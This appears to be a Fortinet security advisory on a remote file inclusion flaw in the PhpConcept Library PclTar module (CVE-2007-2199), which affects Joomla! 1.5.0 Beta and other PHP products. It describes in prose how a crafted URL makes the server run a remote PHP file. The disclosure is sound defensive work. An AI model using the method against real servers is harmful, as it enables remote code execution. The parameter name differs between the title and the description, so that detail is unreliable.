PhpConcept.Library.Parameter.g_pcltar_lib_dir.File.Inclusion

Release Date Aug 02, 2007
Severity low
Impact System compromise, remote script execution.
Description Vincent Blavet PhpConcept Library has a remote file include vulnerability. It is used in multiple products including (1) Joomla! 1.5.0 Beta, (2) N/X Web Content Management System (WCMS) 4.5, (3) CJG EXPLORER PRO 3.3, and (4) phpSiteBackup 0.1. A remote attacker could execute arbitrary script code on the web server with the privileges of the server. This can be done by sending a specially crafted URL request to the 'pcltar.lib.php' or 'pcltar.php' script, using the 'dir_edge_lang' parameter to specify a malicious PHP file from a remote system.
Affected Products Vincent Blavet PhpConcept Library PclTar module version 1.3 and 1.3.1 Joomla! version 1.5.0 Beta and prior N/X Web Content Management System (WCMS) version 4.5 and prior CJG EXPLORER PRO version 3.3 and prior phpSiteBackup version 0.1
Recommended Actions Currently we are not aware of any official fix for this issue.
Coverage IPS VCM
Common Vulnerabilities and Exposures (CVE) CVE-2007-2199
Reference/s http://www.securityfocus.com/bid/23780 (BugTraq) http://www.securityfocus.com/bid/24660 (BugTraq) http://www.securityfocus.com/bid/23613 (BugTraq)

Fortinet